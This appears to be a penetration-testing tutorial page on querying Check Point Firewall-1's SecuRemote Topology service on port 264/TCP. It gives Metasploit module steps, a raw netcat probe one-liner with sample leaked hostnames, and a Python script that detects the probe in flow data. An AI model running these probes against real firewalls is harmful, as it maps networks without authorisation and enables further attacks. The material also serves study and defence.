# Check Point Firewall - Port 264

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}
Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**

* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚
  {% endtab %}
  {% endtabs %}

## Basic info

CheckPoint Firewall-1 is a widely used firewall solution, but certain configurations allow attackers to extract valuable information about the firewall and its management station. This article will demonstrate how an attacker can leverage port **264/TCP** to obtain critical details using publicly available tools and commands.

CheckPoint Firewall-1 includes a **SecuRemote Topology service** running on **port 264/TCP**, which allows unauthenticated queries. By interacting with this service, attackers can retrieve the **firewall's hostname** and the **SmartCenter management station's name**—potentially leading to further attacks.

The ability to obtain these details is particularly dangerous because it helps attackers map the network infrastructure, identify targets for further exploitation, and develop customized phishing attacks.

***

## Exploiting CheckPoint Firewall-1 with Metasploit

Metasploit provides a module that can interact with the firewall to extract its **hostname** and **management station name**.

#### Step 1: Load the Metasploit Module

Open **Metasploit** and load the auxiliary module:

```
use auxiliary/gather/checkpoint_hostname
```

#### Step 2: Set Target IP Address

Set the **RHOST** parameter to the target CheckPoint Firewall-1 instance:

```
set RHOST 10.10.10.10
```

#### Step 3: Execute the Module

Run the module to interact with the firewall:

```
run
```

If the SecuRemote Topology service is reachable and answers unauthenticated queries, the module returns output similar to:

```
[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[+] Appears to be a CheckPoint Firewall...
[+] Firewall Host: FIREFIGHTER-SEC
[+] SmartCenter Host: FIREFIGHTER-MGMT.example.com
[*] Auxiliary module execution completed
```

This confirms the presence of the firewall and exposes its internal naming conventions.

***

## Alternative Method: Extracting Hostname and ICA Name Manually

If Metasploit is unavailable, a direct **Netcat** command can be used to query the firewall:

#### Step 1: Send Query via Netcat

```
printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 10.10.10.10 264 | grep -a CN | cut -c 2-
```

#### Step 2: Analyze the Output

A successful query returns a string containing the **common name (CN)** and **organization (O)** fields, which carry the firewall's hostname and ICA name:

```
CN=Panama,O=MGMTT.srv.rxfrmi
```

These values can be used to gain insights into the firewall’s identity and administrative domains.
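On the defensive side, the query bytes in the Netcat command above work as a detection signature for port 264/TCP. The following is an added example, not code from the original page: the flow-record layout, the `ALLOWED_NETS` range and the sample flows are constructed assumptions, and the client bytes are assumed to be a reassembled TCP stream.

```python
import ipaddress
import re

# Query bytes exactly as sent by the netcat command on this page.
PROBE = b"\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00"
# "CN=<name>,O=<name>" as in the page's sample output; stops at ',' or non-printables.
DN_RE = re.compile(rb"CN=([^,\x00-\x20\x7f-\xff]+),O=([^,\x00-\x20\x7f-\xff]+)")

def classify_flow(flow, allowed_nets):
    """Return an alert for a topology query on 264/TCP, or None if the flow is unrelated."""
    if flow["dst_port"] != 264 or PROBE not in flow["client"]:
        return None
    src = ipaddress.ip_address(flow["src"])
    allowed = any(src in ipaddress.ip_network(net) for net in allowed_nets)
    leak = DN_RE.search(flow["server"])
    if allowed:
        severity = "info"      # expected source, e.g. a VPN client range
    elif leak:
        severity = "high"      # untrusted source received hostnames
    else:
        severity = "medium"    # untrusted source probed, nothing disclosed
    return {
        "src": flow["src"],
        "severity": severity,
        "firewall_cn": leak.group(1).decode() if leak else None,
        "org": leak.group(2).decode() if leak else None,
    }

# Constructed sample data (not real captures); framing bytes around the DN are assumed.
ALLOWED_NETS = ["10.20.0.0/16"]
REPLY = b"\x00\x00\x00\x1dCN=Panama,O=MGMTT.srv.rxfrmi\x00"
FLOWS = [
    {"src": "192.0.2.50", "dst_port": 264, "client": PROBE, "server": REPLY},
    {"src": "10.20.0.7", "dst_port": 264, "client": PROBE, "server": REPLY},
    {"src": "198.51.100.9", "dst_port": 264, "client": PROBE, "server": b""},
    {"src": "192.0.2.50", "dst_port": 264, "client": b"\x16\x03\x01", "server": b""},
]

def run_samples():
    """Classify every constructed flow against the allowed source ranges."""
    return [classify_flow(f, ALLOWED_NETS) for f in FLOWS]

if __name__ == "__main__":
    for alert in run_samples():
        print(alert)
```

A "high" alert means an address outside the allowed ranges both sent the query and received a CN/O string, which is the exposure this page describes; restricting 264/TCP to the networks that need it removes that case.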

***



